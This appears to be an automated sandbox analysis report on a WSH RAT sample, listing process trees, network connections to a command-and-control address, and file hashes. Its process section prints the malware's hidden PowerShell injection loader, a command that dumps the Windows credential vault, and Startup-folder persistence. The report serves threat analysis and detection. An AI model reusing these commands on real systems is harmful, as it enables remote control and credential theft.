| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Sdk283724711.js
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\Sdk283724711.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'2.59.254.111 2420 \"WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands\" 1'));"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
path 2.59.254.111 2420 "WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands" 1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
path 2.59.254.111 2420 "WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands" 1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Roaming\wshsdk" && C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll > "C:\Users\Admin\AppData\Roaming\wshout"
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Roaming\wshsdk" && C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll > "C:\Users\Admin\AppData\Roaming\wshout"
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Users\Admin\AppData\Roaming\cmdc.exe
"C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Roaming\wshlogs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| US | 8.8.8.8:53 | 254.22.238.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.254.59.2.in-addr.arpa | udp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| US | 8.8.8.8:53 | wshsoft.company | udp |
| SG | 194.59.164.67:80 | wshsoft.company | tcp |
| US | 8.8.8.8:53 | 67.164.59.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
Files
C:\Users\Admin\AppData\Roaming\Sdk283724711.js
| MD5 | a577b3a40efbcfb8b749ac033f1a7a71 |
| SHA1 | 2dd22a217b5faec549b6a948a6d1f75c5114c485 |
| SHA256 | 1d96c9a57ad378deea20d2e275d5cc70692e2fb673d311ff3e101e695cf979eb |
| SHA512 | 62eb4a174a8da9cbb5958b0b71d76136a6d52de8a8b54fe2437d714337fdce6f803fba6318f3dee80cc0d8d31119adf7af934833dce9b93b992156b70f4fbde5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sdk283724711.js
| MD5 | a577b3a40efbcfb8b749ac033f1a7a71 |
| SHA1 | 2dd22a217b5faec549b6a948a6d1f75c5114c485 |
| SHA256 | 1d96c9a57ad378deea20d2e275d5cc70692e2fb673d311ff3e101e695cf979eb |
| SHA512 | 62eb4a174a8da9cbb5958b0b71d76136a6d52de8a8b54fe2437d714337fdce6f803fba6318f3dee80cc0d8d31119adf7af934833dce9b93b992156b70f4fbde5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sdk283724711.js
| MD5 | a577b3a40efbcfb8b749ac033f1a7a71 |
| SHA1 | 2dd22a217b5faec549b6a948a6d1f75c5114c485 |
| SHA256 | 1d96c9a57ad378deea20d2e275d5cc70692e2fb673d311ff3e101e695cf979eb |
| SHA512 | 62eb4a174a8da9cbb5958b0b71d76136a6d52de8a8b54fe2437d714337fdce6f803fba6318f3dee80cc0d8d31119adf7af934833dce9b93b992156b70f4fbde5 |
memory/4632-8-0x0000015956AF0000-0x0000015956B12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3zxyma4t.0k5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4632-18-0x00007FFAAAD50000-0x00007FFAAB811000-memory.dmp
memory/4632-20-0x000001593C3F0000-0x000001593C400000-memory.dmp
memory/4632-19-0x000001593C3F0000-0x000001593C400000-memory.dmp
memory/4632-21-0x000001593C3F0000-0x000001593C400000-memory.dmp
memory/4632-24-0x00007FFAAAD50000-0x00007FFAAB811000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 223bd4ae02766ddc32e6145fd1a29301 |
| SHA1 | 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b |
| SHA256 | 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e |
| SHA512 | 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc |
memory/1560-27-0x00000251424E0000-0x00000251424F0000-memory.dmp
memory/1560-26-0x00007FFAAAD50000-0x00007FFAAB811000-memory.dmp
memory/1560-28-0x00000251424E0000-0x00000251424F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 91a39b91c2b22ff00c12e56878baa09b |
| SHA1 | e19e669a9c2c8fec9fb699c4c76384a105471bda |
| SHA256 | 931a2eaa61178581995773a9da78f4bfd76ad27c29b44442fa1329b384a0cd96 |
| SHA512 | 59df651f9cab1c7b960e22d8207766cef07393b33d42f2b759bf4043cd63f2abaf08f9e1b419c6a126fb51a98468d15d34ba09caac46dfbc1a1b658c513aa2b0 |
memory/1560-39-0x00000251424E0000-0x00000251424F0000-memory.dmp
memory/1560-41-0x00007FFAAAD50000-0x00007FFAAB811000-memory.dmp
memory/3316-47-0x00007FFAAAD50000-0x00007FFAAB811000-memory.dmp
memory/3316-52-0x0000023659E00000-0x0000023659E10000-memory.dmp
memory/3316-53-0x0000023659E00000-0x0000023659E10000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 32535a8d767830ad16830ddca0d7e844 |
| SHA1 | 91faee64f812c45f4f7e1dcab1b3fc8314446c6a |
| SHA256 | 659f5725da2bae4a7d94dfa90af83b0e4054465ae8937e570473c1528866f03b |
| SHA512 | 0716d3b0d92627de5c427ba1b0a7ced71a57c49077e27c65d3a8d65a4014145f586ecdade44df908aacfc38d445092f61864ff51a0b4ac0fe35d1bd5cb576e7b |
memory/4964-55-0x0000000000400000-0x000000000040E000-memory.dmp
memory/3316-57-0x00007FFAAAD50000-0x00007FFAAB811000-memory.dmp
memory/4964-58-0x00000000752D0000-0x0000000075A80000-memory.dmp
memory/4964-59-0x0000000005E20000-0x00000000063C4000-memory.dmp
memory/4964-60-0x0000000005870000-0x0000000005902000-memory.dmp
memory/4964-61-0x0000000005830000-0x0000000005840000-memory.dmp
memory/4964-62-0x0000000005910000-0x00000000059AC000-memory.dmp
memory/4964-65-0x00000000057D0000-0x00000000057DA000-memory.dmp
memory/4964-67-0x00000000752D0000-0x0000000075A80000-memory.dmp
memory/4964-68-0x0000000005830000-0x0000000005840000-memory.dmp
C:\Users\Admin\AppData\Roaming\wshsdk.zip
| MD5 | d9a63dfd8b73629421bb44bcde09f312 |
| SHA1 | 7855575c12eaee0e734f3901ca1da2931e9b587a |
| SHA256 | 9d5bb028794410fda9d1b3e0f8deb6beee5bd4e1e55340bd375a209c81dc98eb |
| SHA512 | df195c22f7818569cc92e995846ab507caa30f341ac902cc8afe6f06ae4493709e7f80357c91cf14b21e58e2154e0b35f2154d8a313bf36fcff0b72b3a539cf8 |
C:\Users\Admin\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\test\is64bit.py
| MD5 | ca2cc8e73bbca371935bbc92ed18d567 |
| SHA1 | 1adb458919e842cd78c72b1ff00e5e93cb6ef75e |
| SHA256 | bea3f797921992fda45c19db41e10e3b325bcdd3ea35d35c1fa70535477ad9c1 |
| SHA512 | b63df3bad9272f45ba0f50e2c50aaed7a04eb1b000d5855d9f3a8e5c5f2d381c667b1e9c1e1f03f80584a7941a96992838664ae9dd25e1b8320e026da35b8223 |
memory/5900-21174-0x00007FFAAA940000-0x00007FFAAB401000-memory.dmp
memory/5900-21175-0x000001CF9CD30000-0x000001CF9CD40000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8b9a260789a22d72263ef3bb119108c |
| SHA1 | 376a9bd48726f422679f2cd65003442c0b6f6dd5 |
| SHA256 | d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc |
| SHA512 | 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b |
memory/5900-21176-0x000001CF9CD30000-0x000001CF9CD40000-memory.dmp
memory/5900-21178-0x000001CF84AE0000-0x000001CF84AEA000-memory.dmp
memory/5900-21179-0x000001CF9CC90000-0x000001CF9CC98000-memory.dmp
memory/5900-21182-0x00007FFAAA940000-0x00007FFAAB401000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp.txt
| MD5 | c416c12d1b2b1da8c8655e393b544362 |
| SHA1 | fb1a43cd8e1c556c2d25f361f42a21293c29e447 |
| SHA256 | 0600d59103840dff210778179fdfba904dcb737a4bfdb35384608698c86ea046 |
| SHA512 | cb6d3636be4330aa2fd577c3636d0b7165f92ee817e98f21180ba0c918eb76f4e38f025086593a0e508234ca981cfec2c53482b0e9cc0acfa885fefbdf89913c |
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe
| MD5 | e03cbf90f6ed0c8075e5092621555990 |
| SHA1 | 18ced6a9659a87b7d1458cdb6ce8409219299fc1 |
| SHA256 | 4695914575f30e2ffe1807bf6a032eaebe241809abf97f65f161b7d0ff0031c9 |
| SHA512 | f5cc42d9bde2f389310910203e1140fb03e2059a58e392acfe4e355cde33d7e9ac27c178a296def131ad1868dd375db1f0b091f81c772ea924837f3aa691a97d |
C:\Users\Admin\AppData\Roaming\wshsdk\python37.dll
| MD5 | 7f0b34248c228bebc731ef155b50bbff |
| SHA1 | 67fac3b44b6982a58e9bb6cd20db88f7bc1d0c44 |
| SHA256 | 5de19772b6449a69c2cac3a454d6321fb0c7affc44200ed56b9ec08c38f06578 |
| SHA512 | fdf043f1b3875454e13853ca8754ff8c09431fd8e82d3de1730376175c01f634e1ed585f703e5691b87772ecd952a72c3ecb2a5093dcbda5ce053c0e36d13d23 |
C:\Users\Admin\AppData\Roaming\wshsdk\python37.dll
| MD5 | 7f0b34248c228bebc731ef155b50bbff |
| SHA1 | 67fac3b44b6982a58e9bb6cd20db88f7bc1d0c44 |
| SHA256 | 5de19772b6449a69c2cac3a454d6321fb0c7affc44200ed56b9ec08c38f06578 |
| SHA512 | fdf043f1b3875454e13853ca8754ff8c09431fd8e82d3de1730376175c01f634e1ed585f703e5691b87772ecd952a72c3ecb2a5093dcbda5ce053c0e36d13d23 |
C:\Users\Admin\AppData\Roaming\wshsdk\vcruntime140.dll
| MD5 | ae96651cfbd18991d186a029cbecb30c |
| SHA1 | 18df8af1022b5cb188e3ee98ac5b4da24ac9c526 |
| SHA256 | 1b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1 |
| SHA512 | 42a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7 |
C:\Users\Admin\AppData\Roaming\wshsdk\VCRUNTIME140.dll
| MD5 | ae96651cfbd18991d186a029cbecb30c |
| SHA1 | 18df8af1022b5cb188e3ee98ac5b4da24ac9c526 |
| SHA256 | 1b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1 |
| SHA512 | 42a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__init__.py
| MD5 | 82afd9dcb28c19afdc42097fcbdbe662 |
| SHA1 | 329e052afe981c8ba32ff78df2deb9d041c05f8b |
| SHA256 | 921635dcb46ba5192db20e6c7ed0429c647f7d55ead2f6feaadc00b8410a646e |
| SHA512 | 4ae0a9de57f0df6119b99be7168e35917da63e24487b67a4afe96d3996cc42ad22716ac411791998642498bd5f64ab14d9571f4ebf2ee5abc6eb2761270cc897 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\__init__.cpython-37.pyc
| MD5 | e3f691d123a890f18538f5fead7bd6cd |
| SHA1 | f6e77a0008cefa3a7e3f67c7d11c7787391db5d9 |
| SHA256 | 3473f433a4d2c09e637f6da9b21172d31468a453c2b47fff27f776e820f25934 |
| SHA512 | 776e40399adb6e7211ed67022c2b1b12309e5436760c7a0104fe243610e87559f9890575b972cc569d8d793c2d94c70e2f051f36d803ca7c8c89f77f0b39cc23 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\codecs.py
| MD5 | d1d8d96ee5398cda53cbddca69b8e2ab |
| SHA1 | 3998c0a2124ab260a7d83f296228be90418b8366 |
| SHA256 | 39f79489cb6ef0f95dc0ae007c5ece25897f76fa9b56449922f764896cec5ed3 |
| SHA512 | 0d324416498fba44b41d175194527d5035176642e535bb446ac2c64feed175df7c316507bda375baa77907465973d1340999c859b5d20b51cc2bd96a30857b7b |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\codecs.cpython-37.pyc
| MD5 | 31a2fe679cad1b609caba7c961f43d70 |
| SHA1 | 21d411d11ce126c054ea70f90196c81b18eaa550 |
| SHA256 | 6b903c49e04070578aa47a378ff830bc9407be92c8b952a134cec40e944fa30d |
| SHA512 | 34dde13a6a197caf1ed9fe73ca30e70c966027c44509e398334a6e9be8eb8f5c3289ef66383f3d9cc69da26cca2097c48cb5fde7be14476fe35fd2cc087da855 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\aliases.cpython-37.pyc
| MD5 | 840a56d291513211bd0e65864b9169f3 |
| SHA1 | af58891c07f864d4753baa1dfdbdd71a614cded1 |
| SHA256 | a597b04b97a8bfe577010d816ca8a1480247ea96b025c59c345b7b120bb5f922 |
| SHA512 | b1fbfbc5ca147fd0fcb9e7a509d5ec5a4578bb038a8116c908aa48ecd593694ab4d318b2bc6c8240bc6c2b4e2e23b7b6ed9d295619a862748ad3609445cd3d87 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\latin_1.cpython-37.pyc
| MD5 | 2312f7d16eed297caa4a0da46f612479 |
| SHA1 | afc6f0ff4b5d57204b20c4127a58e8cdb0f1f09d |
| SHA256 | 3b033fb54ed66cfd73e6cd1479e3a7d7166d70d713d232707dd2b28ac92af2c7 |
| SHA512 | 66faa5cc8ede6e929ac22ba48a6f1136a70879ccbdbe31146c1f4fb9f9d3744976e36fc47c533a3be4a6edb5b72870dc12018ac73924acf6217c17002c35815a |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\io.cpython-37.pyc
| MD5 | deddc1aebef1d56aa912f32deff5355f |
| SHA1 | 472c6923a8fae0cfb7fba6890f2c37dfaf685bcc |
| SHA256 | c27434a09d7e90d3e7980427fa6d22d0eb570663e110b68dd9a71f8bcc3aad24 |
| SHA512 | 89edddf61d0ce04650e5886f5dc98931a3ac52ecacac6e8fe78ff2b3c5db5943118b600ca05fec3d4022a6469dfeeea0979b03313fbabfc057ac5772103bd328 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\abc.cpython-37.pyc
| MD5 | cea4fa818d4468f70d14cae1c3fa9593 |
| SHA1 | cb060d183cb2f4850d2199a51e82301f653d51c4 |
| SHA256 | f64180d0a00e09801d9fa616f7fc21ffc7bb532b19209320059eb3d126e0485f |
| SHA512 | 9f434ebacc2d75483b00c4ee687ccd8df69dde06bbf1cb7bb32e7d6ca5db82130f78543a8166446a49fcd51ade6e2f983eb2469dcde0e1f6d4da595fbd01d3a2 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\ascii.py
| MD5 | ff48c6334861799d8d554f5d2a30ba00 |
| SHA1 | 08520b19d0353712cdfd919b3694945678c3d2d7 |
| SHA256 | 698c578b9b5df7bd6f8b2761d114f74cff854c1396083c8ab912b11fcae83b86 |
| SHA512 | 087a0e1ba9d9ca2c2f51f0156ad0ada1d1eb7ccba8b46159b95779b053d2431fc52ba1ca57fec381ea044a7f0e41490b5389b1af2dbf513c35cc1b29997fee6e |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\abc.py
| MD5 | 17e3407344267dde764ecaa542cccd4d |
| SHA1 | ec774abd2a9aa2729a8af6a9cd67dfb22fd0acae |
| SHA256 | f3bbcdb6406b9f9a3467ecd5a8ba74f1accb36adc95aa50d805c2927f09a2304 |
| SHA512 | 850b5f7293ac61d41eb5e13791aac643858daac0950ed1271ac1f3534184f8f379c248e94e63a9abbb699ae4436e4324a96daf5465abc6a50cbe99887024e1f6 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\io.py
| MD5 | 2c098fb1d1a4c0a183da506daa34a786 |
| SHA1 | 55fb1833342ad13c35c6d3cb5fda819327773b21 |
| SHA256 | f89251a16945f7c125554cc91c7e7ed1560b366396c3153a4cadfb7a7133cd03 |
| SHA512 | 375903e7bf79cf6c8e7c4decff482f4b59594aaaef62e01f1f45d0f9e26f9e864690d79cdfbdcf46cd83562cc465ef419cac32739d35bcb9fe6124682a997918 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\latin_1.py
| MD5 | 92c4d5e13fe5abece119aa4d0c4be6c5 |
| SHA1 | 79e464e63e3f1728efe318688fe2052811801e23 |
| SHA256 | 6d5a6c46fe6675543ea3d04d9b27ccce8e04d6dfeb376691381b62d806a5d016 |
| SHA512 | c95f5344128993e9e6c2bf590ce7f2cffa9f3c384400a44c0bc3aca71d666ed182c040ec495ea3af83abbd9053c705334e5f4c3f7c07f65e7031e95fdfb7a561 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\site.cpython-37.pyc
| MD5 | 69561c45246bd13e5e1b9c6cd1b0c2ab |
